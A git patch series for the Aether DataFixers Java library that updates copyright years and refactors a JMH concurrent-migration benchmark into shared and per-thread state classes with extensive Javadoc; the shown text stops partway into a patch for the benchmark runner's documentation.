+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/concurrent/ConcurrentMigrationBenchmark.java
@@ -1,5 +1,5 @@
/*
- * Copyright (c) 2025 Splatgames.de Software and Contributors
+ * Copyright (c) 2026 Splatgames.de Software and Contributors
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/MultiFixChainBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/MultiFixChainBenchmark.java
index e9f0129..2b3e535 100644
--- a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/MultiFixChainBenchmark.java
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/MultiFixChainBenchmark.java
@@ -1,5 +1,5 @@
/*
- * Copyright (c) 2025 Splatgames.de Software and Contributors
+ * Copyright (c) 2026 Splatgames.de Software and Contributors
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/SchemaLookupBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/SchemaLookupBenchmark.java
index a8dbb42..0b72395 100644
--- a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/SchemaLookupBenchmark.java
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/SchemaLookupBenchmark.java
@@ -1,5 +1,5 @@
/*
- * Copyright (c) 2025 Splatgames.de Software and Contributors
+ * Copyright (c) 2026 Splatgames.de Software and Contributors
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/SingleFixBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/SingleFixBenchmark.java
index 2ff7c49..e60fd60 100644
--- a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/SingleFixBenchmark.java
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/SingleFixBenchmark.java
@@ -1,5 +1,5 @@
/*
- * Copyright (c) 2025 Splatgames.de Software and Contributors
+ * Copyright (c) 2026 Splatgames.de Software and Contributors
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/package-info.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/package-info.java
index 08423be..32b058f 100644
--- a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/package-info.java
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/package-info.java
@@ -1,5 +1,5 @@
/*
- * Copyright (c) 2025 Splatgames.de Software and Contributors
+ * Copyright (c) 2026 Splatgames.de Software and Contributors
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/CrossFormatBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/CrossFormatBenchmark.java
index b725afa..0cd6961 100644
--- a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/CrossFormatBenchmark.java
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/CrossFormatBenchmark.java
@@ -1,5 +1,5 @@
/*
- * Copyright (c) 2025 Splatgames.de Software and Contributors
+ * Copyright (c) 2026 Splatgames.de Software and Contributors
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/JsonBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/JsonBenchmark.java
index 545e222..5dcccb6 100644
--- a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/JsonBenchmark.java
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/JsonBenchmark.java
@@ -1,5 +1,5 @@
/*
- * Copyright (c) 2025 Splatgames.de Software and Contributors
+ * Copyright (c) 2026 Splatgames.de Software and Contributors
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/TomlXmlBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/TomlXmlBenchmark.java
index 8d7107f..f618554 100644
--- a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/TomlXmlBenchmark.java
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/TomlXmlBenchmark.java
@@ -1,5 +1,5 @@
/*
- * Copyright (c) 2025 Splatgames.de Software and Contributors
+ * Copyright (c) 2026 Splatgames.de Software and Contributors
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/YamlBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/YamlBenchmark.java
index 2959269..c387455 100644
--- a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/YamlBenchmark.java
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/YamlBenchmark.java
@@ -1,5 +1,5 @@
/*
- * Copyright (c) 2025 Splatgames.de Software and Contributors
+ * Copyright (c) 2026 Splatgames.de Software and Contributors
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/util/BenchmarkBootstrap.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/util/BenchmarkBootstrap.java
index 64b89d4..38a13f3 100644
--- a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/util/BenchmarkBootstrap.java
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/util/BenchmarkBootstrap.java
@@ -1,5 +1,5 @@
/*
- * Copyright (c) 2025 Splatgames.de Software and Contributors
+ * Copyright (c) 2026 Splatgames.de Software and Contributors
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/util/BenchmarkDataGenerator.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/util/BenchmarkDataGenerator.java
index b20926e..7f48696 100644
--- a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/util/BenchmarkDataGenerator.java
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/util/BenchmarkDataGenerator.java
@@ -1,5 +1,5 @@
/*
- * Copyright (c) 2025 Splatgames.de Software and Contributors
+ * Copyright (c) 2026 Splatgames.de Software and Contributors
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/util/PayloadSize.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/util/PayloadSize.java
index 90376fa..82fe8a3 100644
--- a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/util/PayloadSize.java
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/util/PayloadSize.java
@@ -1,5 +1,5 @@
/*
- * Copyright (c) 2025 Splatgames.de Software and Contributors
+ * Copyright (c) 2026 Splatgames.de Software and Contributors
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
From 28dc75834f336c2921a1697bea56eb085176df39 Mon Sep 17 00:00:00 2001
From: Erik
Date: Thu, 29 Jan 2026 21:26:16 +0100
Subject: [PATCH 22/39] Add concurrent benchmarking utilities and comprehensive
Javadoc for `ConcurrentMigrationBenchmark` to enhance multithreaded
performance analysis.
---
.../ConcurrentMigrationBenchmark.java | 566 +++++++++++++++---
.../benchmarks/concurrent/package-info.java | 130 ++++
2 files changed, 604 insertions(+), 92 deletions(-)
create mode 100644 aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/concurrent/package-info.java
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/concurrent/ConcurrentMigrationBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/concurrent/ConcurrentMigrationBenchmark.java
index 3afb77f..a1830bf 100644
--- a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/concurrent/ConcurrentMigrationBenchmark.java
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/concurrent/ConcurrentMigrationBenchmark.java
@@ -49,16 +49,106 @@
import org.openjdk.jmh.annotations.Warmup;
import org.openjdk.jmh.infra.Blackhole;
-import java.util.Random;
+import java.util.SplittableRandom;
import java.util.concurrent.TimeUnit;
/**
- * JMH benchmark for concurrent migration and registry access performance.
+ * JMH benchmark for concurrent DataFixer operations and thread-safety validation.
*
- *
Measures the thread-safety and contention characteristics of the
- * DataFixer and SchemaRegistry under concurrent load.
+ *
This benchmark measures the performance characteristics of the DataFixer system
+ * under concurrent load. It validates thread-safety of shared components and quantifies
+ * scalability across different thread counts. The results help identify contention
+ * points and ensure the framework performs well in multi-threaded environments.
+ *
+ *
Benchmark Categories
+ *
+ *
Concurrent Migration Benchmarks
+ *
Measure DataFixer performance when multiple threads perform migrations simultaneously:
+ *
+ *
{@link #concurrentSingleFix} - Maximum parallelism with single-fix migrations
+ *
{@link #concurrentChainMigration} - Maximum parallelism with 10-fix chain migrations
+ *
{@link #fourThreadMigration} - Fixed 4-thread migration for baseline comparison
+ *
{@link #eightThreadMigration} - Fixed 8-thread migration for scaling analysis
+ *
+ *
+ *
Concurrent Registry Access Benchmarks
+ *
Measure SchemaRegistry performance under concurrent read pressure:
+ *
+ *
{@link #concurrentRegistryLookup} - Random version lookups from multiple threads
*
* @author Erik Pförtner
+ * @see de.splatgames.aether.datafixers.benchmarks.core.SingleFixBenchmark
+ * @see de.splatgames.aether.datafixers.benchmarks.core.MultiFixChainBenchmark
+ * @see BenchmarkBootstrap
* @since 1.0.0
*/
@BenchmarkMode({Mode.Throughput, Mode.AverageTime})
@@ -69,151 +159,443 @@
@Fork(value = 2, jvmArgs = {"-Xms2G", "-Xmx2G"})
public class ConcurrentMigrationBenchmark {
- @Param({"SMALL", "MEDIUM"})
- private PayloadSize payloadSize;
-
- // Shared state across threads
- private DataFixer sharedFixer;
- private DataFixer sharedChainFixer;
- private SchemaRegistry sharedRegistry;
- private DataVersion fromVersion;
- private DataVersion toVersion;
- private DataVersion chainToVersion;
- private DataVersion[] registryVersions;
-
- @Setup(Level.Trial)
- public void setup() {
- // Create shared fixer (thread-safe after freeze)
- this.sharedFixer = BenchmarkBootstrap.createSingleFixFixer();
- this.sharedChainFixer = BenchmarkBootstrap.createChainFixer(10);
- this.fromVersion = new DataVersion(1);
- this.toVersion = new DataVersion(2);
- this.chainToVersion = new DataVersion(11);
-
- // Create shared registry
- final SimpleSchemaRegistry registry = new SimpleSchemaRegistry();
- this.registryVersions = new DataVersion[100];
- for (int i = 0; i < 100; i++) {
- final int version = (i + 1) * 10;
- this.registryVersions[i] = new DataVersion(version);
- registry.register(MockSchemas.minimal(version));
- }
- registry.freeze();
- this.sharedRegistry = registry;
- }
-
- /**
- * Per-thread state for independent test data.
- */
- @State(Scope.Thread)
- public static class ThreadState {
-
- private Dynamic threadInput;
- private Random random;
-
- @Setup(Level.Iteration)
- public void setup(final ConcurrentMigrationBenchmark parent) {
- // Each thread gets its own input data
- this.threadInput = BenchmarkDataGenerator.generate(GsonOps.INSTANCE, parent.payloadSize);
- this.random = new Random();
- }
- }
-
- // ==================== Concurrent Migration ====================
+ // ==================== Concurrent Migration Benchmarks ====================
/**
- * Benchmarks concurrent single-fix migrations using all available processors.
+ * Benchmarks concurrent single-fix migrations with maximum thread parallelism.
*
- * @param state per-thread state
+ *
All available CPU threads simultaneously apply a single DataFix to their
+ * respective input data. This benchmark stress-tests the thread-safety of the
+ * DataFixer implementation and measures maximum achievable throughput.
+ *
+ *
Key aspects measured:
+ *
+ *
Lock contention in shared DataFixer instance
+ *
Memory allocation pressure under concurrent load
+ *
Cache coherency effects from shared schema access
+ *
+ *
+ * @param s shared benchmark state containing the DataFixer and versions
+ * @param t per-thread state containing isolated input data
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@Benchmark
@Threads(Threads.MAX)
- public void concurrentSingleFix(final ThreadState state, final Blackhole blackhole) {
- final Dynamic result = this.sharedFixer.update(
+ public void concurrentSingleFix(final BenchmarkState s,
+ final ThreadState t,
+ final Blackhole blackhole) {
+ final Dynamic result = s.sharedFixer.update(
BenchmarkBootstrap.BENCHMARK_TYPE,
- state.threadInput,
- this.fromVersion,
- this.toVersion);
+ t.threadInput,
+ s.fromVersion,
+ s.toVersion
+ );
blackhole.consume(result);
}
/**
- * Benchmarks concurrent chain migrations using all available processors.
+ * Benchmarks concurrent chain migrations with maximum thread parallelism.
+ *
+ *
All available CPU threads simultaneously apply a 10-fix chain migration.
+ * This benchmark combines the stress of concurrent access with the complexity
+ * of multi-step migrations, revealing performance characteristics under
+ * realistic high-load scenarios.
*
- * @param state per-thread state
+ *
Compared to {@link #concurrentSingleFix}, this benchmark:
Exercises fix ordering and version traversal logic concurrently
+ *
Creates higher memory allocation rates per thread
+ *
+ *
+ * @param s shared benchmark state containing the chain DataFixer
+ * @param t per-thread state containing isolated input data
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@Benchmark
@Threads(Threads.MAX)
- public void concurrentChainMigration(final ThreadState state, final Blackhole blackhole) {
- final Dynamic result = this.sharedChainFixer.update(
+ public void concurrentChainMigration(final BenchmarkState s,
+ final ThreadState t,
+ final Blackhole blackhole) {
+ final Dynamic result = s.sharedChainFixer.update(
BenchmarkBootstrap.BENCHMARK_TYPE,
- state.threadInput,
- this.fromVersion,
- this.chainToVersion);
+ t.threadInput,
+ s.fromVersion,
+ s.chainToVersion
+ );
blackhole.consume(result);
}
/**
- * Benchmarks concurrent migrations with 4 threads.
+ * Benchmarks migration performance with exactly 4 concurrent threads.
+ *
+ *
Provides a fixed-thread baseline for comparing against variable-thread
+ * benchmarks. Four threads represent a typical server core count and help
+ * establish scaling characteristics between single-threaded and maximum
+ * parallelism scenarios.
*
- * @param state per-thread state
+ *
Use this benchmark to:
+ *
+ *
Establish baseline concurrent performance on quad-core systems
+ *
Compare with {@link #eightThreadMigration} to measure scaling factor
+ *
Identify the point where adding threads provides diminishing returns
+ *
+ *
+ * @param s shared benchmark state containing the DataFixer
+ * @param t per-thread state containing isolated input data
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@Benchmark
@Threads(4)
- public void fourThreadMigration(final ThreadState state, final Blackhole blackhole) {
- final Dynamic result = this.sharedFixer.update(
+ public void fourThreadMigration(final BenchmarkState s,
+ final ThreadState t,
+ final Blackhole blackhole) {
+ final Dynamic result = s.sharedFixer.update(
BenchmarkBootstrap.BENCHMARK_TYPE,
- state.threadInput,
- this.fromVersion,
- this.toVersion);
+ t.threadInput,
+ s.fromVersion,
+ s.toVersion
+ );
blackhole.consume(result);
}
/**
- * Benchmarks concurrent migrations with 8 threads.
+ * Benchmarks migration performance with exactly 8 concurrent threads.
+ *
+ *
Tests scaling beyond the 4-thread baseline. Eight threads represent
+ * a common server configuration and help identify whether the DataFixer
+ * implementation scales efficiently with additional parallelism.
+ *
+ *
Scaling analysis:
+ *
+ *
2x throughput vs 4 threads: Perfect linear scaling
+ *
1.5-2x throughput: Good scaling with minor contention
+ *
<1.5x throughput: Contention limiting scalability
+ *
≤1x throughput: Severe contention; investigate locking
+ *
*
- * @param state per-thread state
+ * @param s shared benchmark state containing the DataFixer
+ * @param t per-thread state containing isolated input data
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@Benchmark
@Threads(8)
- public void eightThreadMigration(final ThreadState state, final Blackhole blackhole) {
- final Dynamic result = this.sharedFixer.update(
+ public void eightThreadMigration(final BenchmarkState s,
+ final ThreadState t,
+ final Blackhole blackhole) {
+ final Dynamic result = s.sharedFixer.update(
BenchmarkBootstrap.BENCHMARK_TYPE,
- state.threadInput,
- this.fromVersion,
- this.toVersion);
+ t.threadInput,
+ s.fromVersion,
+ s.toVersion
+ );
blackhole.consume(result);
}
- // ==================== Concurrent Registry Access ====================
+ // ==================== Concurrent Registry Access Benchmarks ====================
/**
- * Benchmarks concurrent schema registry lookups.
+ * Benchmarks concurrent random schema lookups from the registry.
+ *
+ *
All available threads perform random version lookups against a shared
+ * {@link SchemaRegistry} containing 100 schema versions. This benchmark
+ * validates the thread-safety and performance of registry read operations
+ * under heavy concurrent access.
+ *
+ *
The benchmark uses pre-computed random indices (via {@link ThreadState#nextRegistryIndex()})
+ * to avoid RNG contention affecting measurements. Each thread cycles through
+ * a 1024-element buffer of random indices.
*
- * @param state per-thread state
+ *
Performance expectations:
+ *
+ *
Registry lookups should be lock-free and scale linearly
+ *
Cache effects may cause variance based on version access patterns
+ *
No write contention since registry is frozen before benchmarking
+ *
+ *
+ * @param s shared benchmark state containing the registry and versions
+ * @param t per-thread state providing random index sequence
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@Benchmark
@Threads(Threads.MAX)
- public void concurrentRegistryLookup(final ThreadState state, final Blackhole blackhole) {
- final int index = state.random.nextInt(this.registryVersions.length);
- final Schema schema = this.sharedRegistry.get(this.registryVersions[index]);
+ public void concurrentRegistryLookup(final BenchmarkState s,
+ final ThreadState t,
+ final Blackhole blackhole) {
+ final int index = t.nextRegistryIndex();
+ final Schema schema = s.sharedRegistry.get(s.registryVersions[index]);
blackhole.consume(schema);
}
/**
- * Benchmarks concurrent latest schema access.
+ * Benchmarks concurrent latest-schema lookups from the registry.
+ *
+ *
All available threads repeatedly call {@link SchemaRegistry#latest()}
+ * on a shared registry. This represents the "hot path" optimization where
+ * applications frequently need the most recent schema version.
+ *
+ *
This benchmark helps validate:
+ *
+ *
Caching effectiveness for the latest schema reference
+ *
Memory visibility of the cached latest schema across threads
+ *
Absence of unnecessary synchronization on read-only access
+ *
*
+ *
Expected to outperform {@link #concurrentRegistryLookup} due to:
+ *
+ *
No version-to-schema map lookup required
+ *
Single cached reference rather than computed lookup
+ *
Better CPU cache utilization from accessing same memory location
+ *
+ *
+ * @param s shared benchmark state containing the registry
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@Benchmark
@Threads(Threads.MAX)
- public void concurrentLatestLookup(final Blackhole blackhole) {
- final Schema schema = this.sharedRegistry.latest();
+ public void concurrentLatestLookup(final BenchmarkState s,
+ final Blackhole blackhole) {
+ final Schema schema = s.sharedRegistry.latest();
blackhole.consume(schema);
}
+
+ // ==================== State Classes ====================
+
+ /**
+ * Shared benchmark state accessible by all threads.
+ *
+ *
This state class contains all resources that are shared across benchmark
+ * threads, simulating real-world scenarios where a single DataFixer instance
+ * serves multiple concurrent requests.
+ *
+ *
State initialization occurs once per trial (before warmup begins) to
+ * ensure consistent starting conditions across all measurement iterations.
+ *
+ *
Shared Resources
+ *
+ *
{@link #sharedFixer} - Single-fix DataFixer for basic migration benchmarks
+ *
{@link #sharedChainFixer} - 10-fix chain DataFixer for chain migration benchmarks
+ *
{@link #sharedRegistry} - Frozen SchemaRegistry with 100 versions for lookup benchmarks
+ *
Version constants - Pre-computed DataVersion instances to avoid allocation during measurement
+ *
+ */
+ @State(Scope.Benchmark)
+ public static class BenchmarkState {
+
+ /**
+ * The payload size parameter, injected by JMH.
+ *
+ *
Controls the complexity of generated test data for each thread.
+ * Only SMALL and MEDIUM sizes are used to balance benchmark runtime
+ * with meaningful performance differentiation.
+ *
+ * @see PayloadSize
+ */
+ @Param({"SMALL", "MEDIUM"})
+ public PayloadSize payloadSize;
+
+ /**
+ * Shared DataFixer configured with a single fix (v1 → v2).
+ *
+ *
Used by migration benchmarks that measure basic concurrent
+ * fix application without chain traversal overhead.
+ */
+ public DataFixer sharedFixer;
+
+ /**
+ * Shared DataFixer configured with a 10-fix chain (v1 → v11).
+ *
+ *
Used by {@link #concurrentChainMigration} to measure concurrent
+ * performance when applying multiple sequential fixes.
The registry is frozen after population to ensure thread-safe
+ * read access during benchmarks. Versions range from 10 to 1000
+ * in increments of 10.
+ */
+ public SchemaRegistry sharedRegistry;
+
+ /**
+ * Source version for all migrations (v1).
+ */
+ public DataVersion fromVersion;
+
+ /**
+ * Target version for single-fix migrations (v2).
+ */
+ public DataVersion toVersion;
+
+ /**
+ * Target version for chain migrations (v11).
+ */
+ public DataVersion chainToVersion;
+
+ /**
+ * Pre-computed DataVersion array for registry lookup benchmarks.
+ *
+ *
Contains 100 versions (10, 20, 30, ..., 1000) matching the
+ * schemas registered in {@link #sharedRegistry}. Pre-allocation
+ * avoids DataVersion object creation during measurement.
+ */
+ public DataVersion[] registryVersions;
+
+ /**
+ * Initializes all shared benchmark state.
+ *
+ *
Creates DataFixer instances, populates the SchemaRegistry with
+ * 100 versions, and pre-computes all version constants. The registry
+ * is frozen after population to enable lock-free concurrent reads.
+ */
+ @Setup(Level.Trial)
+ public void setup() {
+ this.sharedFixer = BenchmarkBootstrap.createSingleFixFixer();
+ this.sharedChainFixer = BenchmarkBootstrap.createChainFixer(10);
+
+ this.fromVersion = new DataVersion(1);
+ this.toVersion = new DataVersion(2);
+ this.chainToVersion = new DataVersion(11);
+
+ final SimpleSchemaRegistry registry = new SimpleSchemaRegistry();
+ this.registryVersions = new DataVersion[100];
+ for (int i = 0; i < 100; i++) {
+ final int version = (i + 1) * 10;
+ this.registryVersions[i] = new DataVersion(version);
+ registry.register(MockSchemas.minimal(version));
+ }
+ registry.freeze();
+ this.sharedRegistry = registry;
+ }
+ }
+
+ /**
+ * Per-thread benchmark state for isolated data and random access patterns.
+ *
+ *
This state class provides each benchmark thread with its own input data
+ * and random number generator to eliminate false sharing and contention on
+ * thread-local operations.
+ *
+ *
Design Rationale
+ *
+ *
Thread-local input: Each thread operates on its own Dynamic instance,
+ * preventing write contention and ensuring independent GC behavior
+ *
SplittableRandom: Faster and contention-free compared to
+ * {@link java.util.Random} which uses atomic CAS operations
+ *
Pre-computed indices: Random registry indices are generated during
+ * setup to avoid RNG overhead during measurement
+ *
+ *
+ *
Index Buffer Strategy
+ *
The {@link #registryIndexBuffer} uses a power-of-two size (1024) with
+ * bitwise AND masking for efficient wraparound without modulo operations.
+ * This provides pseudo-random access patterns while minimizing measurement
+ * overhead.
+ */
+ @State(Scope.Thread)
+ public static class ThreadState {
+
+ /**
+ * Size of the pre-computed random index buffer.
+ *
+ *
Power of two (1024) enables efficient wraparound via bitwise AND.
+ * Large enough to avoid pattern repetition affecting cache behavior
+ * during typical measurement windows.
+ */
+ private static final int INDEX_BUFFER_SIZE = 1024;
+
+ /**
+ * Bitmask for efficient modulo operation on buffer index.
+ *
+ *
Used as {@code cursor & INDEX_MASK} instead of {@code cursor % INDEX_BUFFER_SIZE}
+ * for faster wraparound calculation.
+ */
+ private static final int INDEX_MASK = INDEX_BUFFER_SIZE - 1;
+
+ /**
+ * Pre-computed random indices for registry lookup benchmarks.
+ *
+ *
Populated during iteration setup with random values in range
+ * [0, registryVersions.length). Accessed via {@link #nextRegistryIndex()}.
+ */
+ private final int[] registryIndexBuffer = new int[INDEX_BUFFER_SIZE];
+
+ /**
+ * Per-thread input data for migration benchmarks.
+ *
+ *
Regenerated at each iteration to ensure consistent memory allocation
+ * patterns and prevent cross-iteration caching effects.
+ */
+ public Dynamic threadInput;
+
+ /**
+ * Current position in the {@link #registryIndexBuffer}.
+ *
+ *
Incremented on each call to {@link #nextRegistryIndex()} and
+ * wrapped using {@link #INDEX_MASK}.
+ */
+ private int registryCursor;
+
+ /**
+ * Per-thread random number generator.
+ *
+ *
{@link SplittableRandom} is used instead of {@link java.util.Random}
+ * because it is faster and does not use atomic operations, eliminating
+ * contention when multiple threads generate random numbers.
+ */
+ private SplittableRandom random;
+
+ /**
+ * Initializes the per-thread random number generator.
+ *
+ *
Called once per trial. Uses a fixed seed (42) for reproducibility
+ * across benchmark runs, though each thread will produce different
+ * sequences due to {@link SplittableRandom}'s splittable nature.
+ */
+ @Setup(Level.Trial)
+ public void setupTrial() {
+ // Per-thread RNG avoids contention and is faster than java.util.Random.
+ this.random = new SplittableRandom(42L);
+ }
+
+ /**
+ * Regenerates input data and random indices for each iteration.
+ *
+ *
Fresh data generation per iteration ensures:
+ *
+ *
Consistent GC pressure across iterations
+ *
No JIT over-optimization on specific data patterns
+ *
Independent memory allocation per thread
+ *
+ *
+ *
The random index buffer is refilled with new random values to
+ * vary the registry access pattern across iterations.
+ *
+ * @param s the shared benchmark state providing payload size and version array
+ */
+ @Setup(Level.Iteration)
+ public void setupIteration(final BenchmarkState s) {
+ this.threadInput = BenchmarkDataGenerator.generate(GsonOps.INSTANCE, s.payloadSize);
+
+ for (int i = 0; i < INDEX_BUFFER_SIZE; i++) {
+ this.registryIndexBuffer[i] = this.random.nextInt(s.registryVersions.length);
+ }
+ this.registryCursor = 0;
+ }
+
+ /**
+ * Returns the next pre-computed random index for registry lookups.
+ *
+ *
Retrieves the next value from {@link #registryIndexBuffer} and
+ * advances the cursor with efficient bitwise wraparound. This method
+ * is called during measurement and is optimized to minimize overhead.
+ *
+ * @return a random index in range [0, registryVersions.length)
+ */
+ public int nextRegistryIndex() {
+ return this.registryIndexBuffer[this.registryCursor++ & INDEX_MASK];
+ }
+ }
}
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/concurrent/package-info.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/concurrent/package-info.java
new file mode 100644
index 0000000..9b374ee
--- /dev/null
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/concurrent/package-info.java
@@ -0,0 +1,130 @@
+/*
+ * Copyright (c) 2026 Splatgames.de Software and Contributors
+ *
+ * Permission is hereby granted, free of charge, to any person obtaining a copy
+ * of this software and associated documentation files (the "Software"), to deal
+ * in the Software without restriction, including without limitation the rights
+ * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+ * copies of the Software, and to permit persons to whom the Software is
+ * furnished to do so, subject to the following conditions:
+ *
+ * The above copyright notice and this permission notice shall be included in all
+ * copies or substantial portions of the Software.
+ *
+ * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+ * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+ * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+ * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+ * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+ * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+ * SOFTWARE.
+ */
+
+/**
+ * Concurrency-focused JMH benchmarks for the Aether DataFixers framework.
+ *
+ *
This package contains benchmarks that measure performance characteristics under
+ * concurrent load. These benchmarks validate thread-safety of the DataFixer system,
+ * identify contention points, and quantify scalability across different thread counts.
Single-threaded benchmarks measure raw operation performance, but real-world
+ * applications often use the DataFixer system from multiple threads simultaneously.
+ * Concurrent benchmarks reveal:
+ *
+ *
Lock contention: Synchronization overhead in shared components
+ *
Cache coherency effects: Performance impact of shared data access
+ *
Scalability limits: Point at which adding threads stops improving throughput
+ *
Thread-safety validation: Correctness under concurrent access
The {@link de.splatgames.aether.datafixers.benchmarks.core core} package
+ * measures single-threaded baseline performance. Use concurrent benchmarks to:
+ *
+ *
Calculate concurrency overhead: {@code (single-threaded throughput × N threads) / actual throughput}
+ *
Identify scaling efficiency: {@code actual throughput / (single-threaded throughput × N threads)}
+ *
Detect regression: Compare concurrent results across code changes
This class provides a convenient way to run benchmarks programmatically
- * with default settings optimized for comprehensive performance analysis.
+ *
This class provides both a command-line interface and programmatic API for
+ * executing benchmarks. It supports all standard JMH options while providing
+ * convenient preset configurations for common benchmark scenarios.
*
- *
Usage
+ *
Execution Methods
*
- *
Via exec:java (Quick Development Runs)
+ *
Via Maven exec:java (Development)
+ *
Quick way to run benchmarks during development without building a JAR:
*
{@code
* # Run all benchmarks with default settings
* mvn exec:java -pl aether-datafixers-benchmarks
*
* # Run with JMH arguments
* mvn exec:java -pl aether-datafixers-benchmarks -Dexec.args="-h"
+ *
